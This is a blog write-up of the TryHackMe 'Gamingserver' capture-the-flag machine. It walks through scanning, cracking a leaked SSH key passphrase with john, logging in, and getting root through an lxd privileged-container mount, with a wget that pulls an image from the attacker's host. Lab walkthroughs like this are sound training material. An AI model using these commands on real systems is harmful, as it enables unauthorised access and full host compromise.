r4yan.com

Home / About / Posts / Keybase / BreachForums / Github

THM Gamingserver writeup

first start by doing a port scan

rustscan $IP

results:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

then start start dirbuster or gobuster to search for hidden files

gobuster dir -u $IP -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

you will then find an interesting folder called “/secret”

that contains a ssh key, download it

after you downloaded that key create a new hash file using ssh2john

python ssh2john.py SecretKey > id_rsa.hash

and then crack it using john and rockyou wordlist

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

results

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:12 DONE (2020-08-30 22:24) 0.08278g/s 1187Kp/s 1187Kc/s 1187KC/s *7¡Vamos! *
Session completed

then i found a user that can be used for a ssh connection on the website source code

in the bottom line of : https://$IP/index.html

as you can see there is a user called john

connect to the server throught ssh

ssh john@$IP -i ./SecretKey

enter the passphrase and you logged in as john

now get the user flag

cat user.txt
a****************e

after searching and looking in the machine i found an interesting service called lxd(Linux Containers) owned by root and that can be used by anyone,

locally clone that repo and run the other commands

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder

then start a simple web server

python -m SimpleHTTPServer

then download the files you just downloaded locally

cd /tmp
wget http://$LHOST:8000/alpine-v3.12-x86_64-20200830_2354.tar.gz

replace $LHOST with your local ip address (run “ip addr” to see it)

import the image by running:

lxc image import ./alpine-v3.12-x86_64-20200830_2354.tar.gz --alias myimage

then spawn a root shell by running this list of commands

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
whoami

now get the root flag

cat mnt/root/root/flag.txt
2************c

if you don’t get your root shell or it’s not working try following this guide for privilege escalation about lxd